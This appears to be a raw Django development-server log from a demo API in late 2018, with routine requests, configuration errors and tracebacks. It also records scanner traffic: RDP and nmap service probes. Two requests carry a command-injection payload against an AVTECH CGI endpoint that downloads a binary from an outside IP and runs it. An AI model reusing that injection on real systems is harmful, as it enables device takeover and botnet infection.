[24/Oct/2018 16:55:01] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 16:55:01] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 16:55:01] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 16:55:16] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 16:55:17] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 16:55:17] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 16:55:28] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 16:55:28] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 16:55:28] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 16:58:49] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 16:58:49] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 16:58:50] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 18:59:23] "GET /api/person/1/ HTTP/1.1" 200 285
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[24/Oct/2018 20:19:28] "GET / HTTP/1.0" 400 60183
[24/Oct/2018 21:53:43] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 21:53:44] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 21:53:44] "GET /favicon.ico HTTP/1.1" 404 2550
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[24/Oct/2018 21:58:14] "GET / HTTP/1.0" 400 60183
[24/Oct/2018 23:09:04] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 23:09:04] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 23:09:05] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 23:10:00] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 23:10:00] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 23:10:01] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 23:11:09] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 23:11:09] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 23:11:09] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 23:13:19] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 23:13:19] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 23:13:19] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 23:13:42] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 23:13:42] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 23:13:42] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 23:14:11] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 23:14:12] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 23:14:12] "GET /favicon.ico HTTP/1.1" 404 2550
[24/Oct/2018 23:14:55] "GET / HTTP/1.1" 200 3464
[24/Oct/2018 23:14:55] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[24/Oct/2018 23:14:55] "GET /favicon.ico HTTP/1.1" 404 2550
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[25/Oct/2018 00:06:35] "GET / HTTP/1.0" 400 60183
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[25/Oct/2018 02:30:49] "GET / HTTP/1.0" 400 60182
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[25/Oct/2018 07:47:58] "GET / HTTP/1.0" 400 60182
[25/Oct/2018 17:29:04] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[25/Oct/2018 21:24:33] "GET / HTTP/1.0" 400 60181
Not Found: /status
[25/Oct/2018 21:37:53] "GET /status HTTP/1.1" 404 2535
[25/Oct/2018 22:15:45] "GET / HTTP/1.1" 200 3464
[25/Oct/2018 22:15:45] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[25/Oct/2018 22:15:45] "GET /favicon.ico HTTP/1.1" 404 2550
[25/Oct/2018 22:16:07] "GET / HTTP/1.1" 200 3464
[25/Oct/2018 22:16:07] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[25/Oct/2018 22:16:07] "GET /favicon.ico HTTP/1.1" 404 2550
[26/Oct/2018 04:47:48] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[26/Oct/2018 04:47:48] "  /*à     Cookie: mstshash=Administr" 400 -
[26/Oct/2018 05:56:19] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[26/Oct/2018 17:24:22] "GET / HTTP/1.0" 400 60183
[26/Oct/2018 18:13:39] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[26/Oct/2018 18:13:39] "  /*à     Cookie: mstshash=Administr" 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[26/Oct/2018 20:38:08] "GET / HTTP/1.0" 400 60183
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[27/Oct/2018 00:24:46] "GET / HTTP/1.0" 400 60182
Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 279, in write
    self._write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 463, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.5/socket.py", line 593, in write
    return self._sock.send(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[27/Oct/2018 00:24:46] "GET / HTTP/1.0" 500 59
Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 279, in write
    self._write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 463, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.5/socket.py", line 593, in write
    return self._sock.send(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 86, in handle_error
    super().handle_error()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.5/socketserver.py", line 625, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 154, in handle
    handler.run(self.server.get_app())
  File "/usr/lib/python3.5/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/lib/python3.5/wsgiref/simple_server.py", line 36, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
[27/Oct/2018 21:28:03] "GET / HTTP/1.1" 200 3464
[28/Oct/2018 05:50:43] "GET / HTTP/1.1" 200 3464
[28/Oct/2018 10:57:34] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[28/Oct/2018 10:57:34] "  /*à     Cookie: mstshash=Administr" 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[28/Oct/2018 13:51:41] "GET / HTTP/1.0" 400 60183
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[28/Oct/2018 15:05:47] "GET / HTTP/1.0" 400 60184
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[28/Oct/2018 18:51:39] "GET / HTTP/1.0" 400 60182
[28/Oct/2018 19:32:05] code 400, message Bad request syntax ('\x00\x00\x00TZ\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x04\x010I\x00\x00\x00\x00\x80\x0b¨À\x00\x0c)t F\x07\x00tsXrcsXYs9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00bbXcsXctst\x00\x00\x00\x00\x00\x00')
[28/Oct/2018 19:32:05] "   TZ          0I    ¨À )t F tsXrcsXYs9                      bbXcsXctst      " 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[29/Oct/2018 00:42:15] "GET / HTTP/1.0" 400 60183
[29/Oct/2018 00:42:21] code 400, message Bad HTTP/0.9 request type ('l\x00')
[29/Oct/2018 00:42:21] "l          " 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /nice ports,/Trinity.txt.bak
[29/Oct/2018 00:42:21] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 400 60492
[29/Oct/2018 00:42:21] code 400, message Bad request syntax ('\x05\x04\x00\x01\x02\x80\x05\x01\x00\x03')
[29/Oct/2018 00:42:21] "  " 400 -
[29/Oct/2018 00:42:26] code 400, message Bad request syntax ('\x04\x01\x00\x16\x7f\x00\x00\x01root\x00')
[29/Oct/2018 00:42:26] "   root " 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[29/Oct/2018 00:42:26] "OPTIONS / HTTP/1.0" 400 60211
[29/Oct/2018 00:42:26] code 400, message Bad request version ('RTSP/1.0')
[29/Oct/2018 00:42:26] "OPTIONS / RTSP/1.0" 400 -
[29/Oct/2018 00:42:31] code 400, message Bad request version ('\x00\x01\x97|\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
[29/Oct/2018 00:42:31] "  (rþ          |                    " 400 -
[29/Oct/2018 00:42:36] code 400, message Bad HTTP/0.9 request type ('\x00')
[29/Oct/2018 00:42:36] "          versionbind   " 400 -
[29/Oct/2018 00:42:41] code 400, message Bad HTTP/0.9 request type ('\x00')
[29/Oct/2018 00:42:41] "            " 400 -
[29/Oct/2018 00:42:41] code 400, message Bad request syntax ('HELP')
[29/Oct/2018 00:42:41] "HELP" 400 -
[29/Oct/2018 00:42:42] code 400, message Bad request syntax ('\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G×÷º,îê²`~ó\x00ý\x82{¹Õ\x96Èw\x9bæÄÛ<=Ûoï\x10n\x00\x00(\x00\x16\x00\x13\x00')
[29/Oct/2018 00:42:42] You're accessing the development server over HTTPS, but it only supports HTTP.

[29/Oct/2018 00:42:42] code 400, message Bad request version ('\x00/\x00')
[29/Oct/2018 00:42:42] You're accessing the development server over HTTPS, but it only supports HTTP.

[29/Oct/2018 00:42:42] code 400, message Bad request syntax ('\x00\x00\x00qj\x81n0\x81k¡\x03\x02\x01\x05¢\x03\x02\x01')
[29/Oct/2018 00:42:42] "   qjn0k¡¢" 400 -
[29/Oct/2018 00:42:47] code 400, message Bad request syntax ('\x00\x00\x00¤ÿSMBr\x00\x00\x00\x00\x08\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x06\x00\x00\x01\x00\x00\x81\x00\x02PC NETWORK PROGRAM 1.0\x00\x02MICROSOFT NETWORKS 1.03\x00\x02MICROSOFT NETWORKS 3.0\x00\x02LANMAN1.0\x00\x02LM1.2X002\x00\x02Samba\x00\x02NT LANMAN 1.0\x00\x02NT LM 0.12\x00')
[29/Oct/2018 00:42:47] "   ¤ÿSMBr    @              @     PC NETWORK PROGRAM 1.0 MICROSOFT NETWORKS 1.03 MICROSOFT NETWORKS 3.0 LANMAN1.0 LM1.2X002 Samba NT LANMAN 1.0 NT LM 0.12 " 400 -
[29/Oct/2018 00:42:47] code 400, message Bad request syntax ('\x01default')
[29/Oct/2018 00:42:47] "default" 400 -
[29/Oct/2018 00:42:47] code 400, message Bad request syntax ('0\x84\x00\x00\x00-\x02\x01\x07c\x84\x00\x00\x00$\x04\x00')
[29/Oct/2018 00:42:47] "0   -c   $ " 400 -
[29/Oct/2018 00:42:52] code 400, message Bad HTTP/0.9 request type ('0')
[29/Oct/2018 00:42:52] "0`  " 400 -
[29/Oct/2018 00:42:52] code 400, message Bad request version ('SIP/2.0')
[29/Oct/2018 00:42:52] "OPTIONS sip:nm SIP/2.0" 400 -
[29/Oct/2018 00:42:57] code 400, message Bad request syntax ('TNMP\x04\x00\x00\x00TNME\x00\x00\x04\x00')
[29/Oct/2018 00:42:57] "TNMP   TNME   " 400 -
[29/Oct/2018 00:43:02] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00')
[29/Oct/2018 00:43:02] "  à     " 400 -
[29/Oct/2018 00:43:07] code 400, message Bad request syntax ('DmdT\x00\x00\x00\x17\x00\x00\x00\x01\x00\x00\x00\x00\x11\x11\x00ÿ\x01ÿ\x13')
[29/Oct/2018 00:43:07] "DmdT           ÿÿ" 400 -
[29/Oct/2018 00:43:12] code 400, message Bad HTTP/0.9 request type (':\x00\x00\x00/\x00\x00\x00\x02\x00\x00@\x02\x0f\x00\x01\x00=\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\x00\x00@')
[29/Oct/2018 00:43:12] ":   /     @  =            /         @                 " 400 -
[29/Oct/2018 00:43:17] code 400, message Bad request syntax ('JRMI\x00\x02K')
[29/Oct/2018 00:43:17] "JRMI K" 400 -
[29/Oct/2018 00:43:22] code 400, message Bad request syntax ('\x01\x00\x00ýÎú\x0b°\xa0\x00\x00\x00MMS\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x01\x00\x03\x00ðððð\x0b\x00\x04\x00\x1c\x00\x03\x00N\x00S\x00P\x00l\x00a\x00y\x00e\x00r\x00/\x009\x00.\x000\x00.\x000\x00.\x002\x009\x008\x000\x00;\x00 \x00{\x000\x000\x000\x000\x00A\x00A\x000\x000\x00-\x000\x00A\x000\x000\x00-\x000\x000\x00a\x000\x00-\x00A\x00A\x000\x00A\x00-\x000\x000\x000\x000\x00A\x000\x00A\x00A\x000\x00A\x00A\x000\x00}\x00\x00\x00àmß_')
[29/Oct/2018 00:43:22] "  ýÎú°    MMS                    ðððð    N S P l a y e r / 9 . 0 . 0 . 2 9 8 0 ;   { 0 0 0 0 A A 0 0 - 0 A 0 0 - 0 0 a 0 - A A 0 A - 0 0 0 0 A 0 A A 0 A A 0 }   àmß_" 400 -
[29/Oct/2018 00:43:28] code 400, message Bad HTTP/0.9 request type ('\x00Z\x00\x00\x01\x00\x00\x00\x016\x01,\x00\x00\x08\x00\x7fÿ\x7f\x08\x00\x00\x00\x01\x00')
[29/Oct/2018 00:43:28] " Z     6,   ÿ      :                4æ           (CONNECT_DATA=(COMMAND=version))" 400 -
[29/Oct/2018 00:43:33] code 400, message Bad request version ('\x03\x00(\x00\x04ÿ\x08\x00\x01U\x00\x00\x00MSSQLServer\x00H\x0f\x00\x00')
[29/Oct/2018 00:43:33] " 4            ( ÿ U   MSSQLServer H  " 400 -
[29/Oct/2018 00:43:38] code 400, message Bad request syntax ('\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x0f\x00')
[29/Oct/2018 00:43:38] "              " 400 -
[29/Oct/2018 00:43:43] code 400, message Bad request syntax ('GIOP\x01\x00\x01\x00$\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00abcdef\x00\x00\x04\x00\x00\x00get\x00\x00\x00\x00\x00')
[29/Oct/2018 00:43:43] "GIOP  $                abcdef     get     " 400 -
Not Found: /nmaplowercheck1540773853
[29/Oct/2018 00:44:13] "GET /nmaplowercheck1540773853 HTTP/1.1" 404 2589
Not Found: /HNAP1
[29/Oct/2018 00:44:13] "GET /HNAP1 HTTP/1.1" 404 2532
Not Found: /sdk
[29/Oct/2018 00:44:14] "POST /sdk HTTP/1.1" 404 2527
Not Found: /evox/about
[29/Oct/2018 00:44:14] "GET /evox/about HTTP/1.1" 404 2547
[29/Oct/2018 00:44:14] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'www'. You may need to add 'www' to ALLOWED_HOSTS.
Bad Request: /
[29/Oct/2018 00:44:19] "GET / HTTP/1.1" 400 60592
[29/Oct/2018 09:03:03] "GET / HTTP/1.1" 200 3464
[29/Oct/2018 18:21:38] "GET / HTTP/1.1" 200 3464
[29/Oct/2018 18:21:38] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[29/Oct/2018 18:21:38] "GET /favicon.ico HTTP/1.1" 404 2550
[29/Oct/2018 18:29:32] "GET / HTTP/1.1" 200 3464
[29/Oct/2018 18:29:32] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[29/Oct/2018 18:29:32] "GET /favicon.ico HTTP/1.1" 404 2550
[29/Oct/2018 18:31:24] "GET / HTTP/1.1" 200 3464
[29/Oct/2018 18:31:24] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[29/Oct/2018 18:31:25] "GET /favicon.ico HTTP/1.1" 404 2550
[29/Oct/2018 18:38:27] "GET / HTTP/1.1" 200 3464
[29/Oct/2018 18:38:28] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[29/Oct/2018 18:38:28] "GET /favicon.ico HTTP/1.1" 404 2550
[29/Oct/2018 18:39:11] "GET / HTTP/1.1" 200 3464
[29/Oct/2018 18:39:12] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[29/Oct/2018 18:39:12] "GET /favicon.ico HTTP/1.1" 404 2550
[29/Oct/2018 18:42:47] "GET / HTTP/1.1" 200 3464
[29/Oct/2018 18:42:47] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[29/Oct/2018 18:42:48] "GET /favicon.ico HTTP/1.1" 404 2550
[29/Oct/2018 18:44:35] "GET / HTTP/1.1" 200 3464
[29/Oct/2018 18:44:35] "GET /api/person/1/ HTTP/1.1" 200 285
Not Found: /favicon.ico
[29/Oct/2018 18:44:35] "GET /favicon.ico HTTP/1.1" 404 2550
[30/Oct/2018 06:50:58] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[30/Oct/2018 07:09:12] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64418
[30/Oct/2018 16:33:13] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[30/Oct/2018 16:33:13] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /status
[30/Oct/2018 18:43:11] "GET /status HTTP/1.1" 404 2535
[30/Oct/2018 19:28:54] "GET / HTTP/1.1" 200 3464
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /
[31/Oct/2018 02:29:06] "GET / HTTP/1.0" 400 60183
[31/Oct/2018 12:37:25] "GET / HTTP/1.1" 200 3464
[31/Oct/2018 15:15:50] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[31/Oct/2018 15:15:50] "  /*à     Cookie: mstshash=Administr" 400 -
[31/Oct/2018 22:22:05] "GET / HTTP/1.1" 200 3464
[01/Nov/2018 04:36:31] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[01/Nov/2018 04:36:31] "  /*à     Cookie: mstshash=Administr" 400 -
[01/Nov/2018 13:20:21] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[01/Nov/2018 13:20:21] "  /*à     Cookie: mstshash=Administr" 400 -
[01/Nov/2018 21:00:13] "GET /api/person/1/ HTTP/1.1" 200 285
[01/Nov/2018 21:50:03] "GET / HTTP/1.1" 200 3464
Not Found: /favicon.ico
[01/Nov/2018 21:50:09] "GET /favicon.ico HTTP/1.1" 404 2550
[02/Nov/2018 00:09:10] "GET / HTTP/1.1" 200 3464
[02/Nov/2018 05:42:00] code 400, message Bad HTTP/0.9 request type ('\x00\x00\x00')
[02/Nov/2018 05:42:00] "    c                           " 400 -
[02/Nov/2018 05:52:07] code 400, message Bad HTTP/0.9 request type ('\x00\x00\x00')
[02/Nov/2018 05:52:07] "    c                           " 400 -
Invalid HTTP_HOST header: 'demo:8000'. You may need to add 'demo' to ALLOWED_HOSTS.
Bad Request: /cgi-bin/nobody/Search.cgi
[02/Nov/2018 20:02:26] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 64417
[02/Nov/2018 21:01:47] "GET / HTTP/1.1" 200 3464
Traceback (most recent call last):
  File "/usr/lib/python3.5/socketserver.py", line 625, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.5/socketserver.py", line 354, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.5/socketserver.py", line 681, in __init__
    self.handle()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/servers/basehttp.py", line 139, in handle
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.5/socket.py", line 575, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[02/Nov/2018 21:59:35] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[02/Nov/2018 21:59:35] "  *%à     Cookie: mstshash=Test" 400 -
[02/Nov/2018 21:59:35] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
[02/Nov/2018 21:59:35] "  *%à     Cookie: mstshash=Test" 400 -
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
  File "./manage.py", line 14
    ) from exc
         ^
SyntaxError: invalid syntax
[03/Nov/2018 04:22:21] "GET / HTTP/1.1" 200 3358
Internal Server Error: /api/person/1/
Traceback (most recent call last):
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/sqlite3/base.py", line 296, in execute
    return Database.Cursor.execute(self, query, params)
sqlite3.OperationalError: no such table: api_person

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/base.py", line 126, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/core/handlers/base.py", line 124, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/views/decorators/csrf.py", line 54, in wrapped_view
    return view_func(*args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/viewsets.py", line 103, in view
    return self.dispatch(request, *args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 483, in dispatch
    response = self.handle_exception(exc)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 443, in handle_exception
    self.raise_uncaught_exception(exc)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/views.py", line 480, in dispatch
    response = handler(request, *args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/mixins.py", line 56, in retrieve
    instance = self.get_object()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/generics.py", line 98, in get_object
    obj = get_object_or_404(queryset, **filter_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/rest_framework/generics.py", line 21, in get_object_or_404
    return _get_object_or_404(queryset, *filter_args, **filter_kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/shortcuts.py", line 93, in get_object_or_404
    return queryset.get(*args, **kwargs)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 393, in get
    num = len(clone)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 250, in __len__
    self._fetch_all()
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 1186, in _fetch_all
    self._result_cache = list(self._iterable_class(self))
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/query.py", line 54, in __iter__
    results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/models/sql/compiler.py", line 1065, in execute_sql
    cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 100, in execute
    return super().execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 68, in execute
    return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 77, in _execute_with_wrappers
    return executor(sql, params, many, context)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/utils.py", line 89, in __exit__
    raise dj_exc_value.with_traceback(traceback) from exc_value
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/utils.py", line 85, in _execute
    return self.cursor.execute(sql, params)
  File "/home/ubuntu/virenv/lib/python3.5/site-packages/django/db/backends/sqlite3/base.py", line 296, in execute
    return Database.Cursor.execute(self, query, params)
django.db.utils.OperationalError: no such table: api_person
